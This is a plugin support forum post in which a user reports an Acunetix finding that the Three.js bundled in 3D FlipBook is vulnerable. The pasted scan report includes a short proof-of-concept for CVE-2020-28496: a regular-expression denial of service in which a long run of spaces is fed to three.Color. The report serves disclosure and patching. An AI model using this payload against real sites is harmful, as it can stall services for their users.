• Resolved yen0727

    (@yen0727)


    I scanned my website using Acunetix. It shows that Three.js used by 3D FlipBook is vulnerable and needs to be updated.

    The detailed scan report is as follows

    ========================================================

    This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC: var three =require(‘three’) function build_blank (n) { var ret = “rgb(” for (var i = 0; i < n; i++) { ret += ” ” } return ret + “”; } var Color =three.Color var time = Date.now(); new Color(build_blank(50000)) var time_cost = Date.now() – time;console.log(time_cost+” ms”)

    References
    CVE-2020-28496 (https://nvd.nist.gov/vuln/detail/CVE-2020-28496)
    CVE-2020-28496 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28496)

Viewing 3 replies - 1 through 3 (of 3 total)
Viewing 3 replies - 1 through 3 (of 3 total)
  • You must be logged in to reply to this topic.